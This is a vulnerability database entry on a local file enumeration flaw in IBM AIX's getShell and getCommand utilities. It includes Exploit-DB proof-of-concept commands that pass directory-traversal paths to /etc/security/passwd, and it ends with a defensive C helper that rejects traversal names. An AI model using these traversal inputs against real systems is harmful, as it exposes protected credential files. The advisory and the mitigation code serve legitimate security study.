Vendor: IBM AIX
by:
CVSS: 5.5 (MEDIUM)
CWE: Local File Enumeration
Product Name: IBM AIX
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Local File Enumeration in IBM AIX

The vulnerability allows local attackers to enumerate the existence of files on the computer that they wouldn't ordinarily be able to see. An attacker can exploit this issue by using a specially crafted input to the 'getShell' or 'getCommand' function, allowing them to view files that would normally be inaccessible.

Mitigation:

No known mitigation is available at the time of writing. It is advised to monitor and restrict access to sensitive files and directories.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16102/info

IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.

-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
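
In the session above, a path that exists produces no output while a missing one produces an fopen error, and that difference is the enumeration oracle. The following is an added example, not IBM's code and not part of the original advisory: a sketch of a helper that rejects traversal names and reports every failure identically. The names is_plain_name and open_entry and the directory path are hypothetical.

```c
/* Added example: not IBM's code. A helper that opens a caller-named entry
 * under a fixed directory (names and layout here are hypothetical). */
#include <stdio.h>
#include <string.h>

enum lookup_result { LOOKUP_OK = 0, LOOKUP_DENIED = 1 };

/* Accept exactly one path component: non-empty, no '/', not "." or "..". */
static int is_plain_name(const char *name)
{
    if (name == NULL || name[0] == '\0' || strlen(name) > 255)
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    return strchr(name, '/') == NULL;
}

/* Every failure (bad name, missing file, no permission) returns the same
 * code, so the caller cannot tell "does not exist" from "not allowed". */
static enum lookup_result open_entry(const char *dir, const char *name, FILE **out)
{
    char path[1024];

    *out = NULL;
    if (is_plain_name(name)) {
        int n = snprintf(path, sizeof path, "%s/%s", dir, name);
        if (n > 0 && (size_t)n < sizeof path)
            *out = fopen(path, "r");
    }
    return *out != NULL ? LOOKUP_OK : LOOKUP_DENIED;
}

int main(int argc, char **argv)
{
    FILE *fp;

    /* "/usr/local/helper/cmds" is a constructed directory for illustration. */
    if (argc != 2 || open_entry("/usr/local/helper/cmds", argv[1], &fp) != LOOKUP_OK) {
        fputs("request denied\n", stderr);   /* one message, no perror() */
        return 1;
    }
    fclose(fp);
    return 0;
}
```

A symlink placed inside the directory would still be followed, so the directory itself must not be writable by unprivileged users.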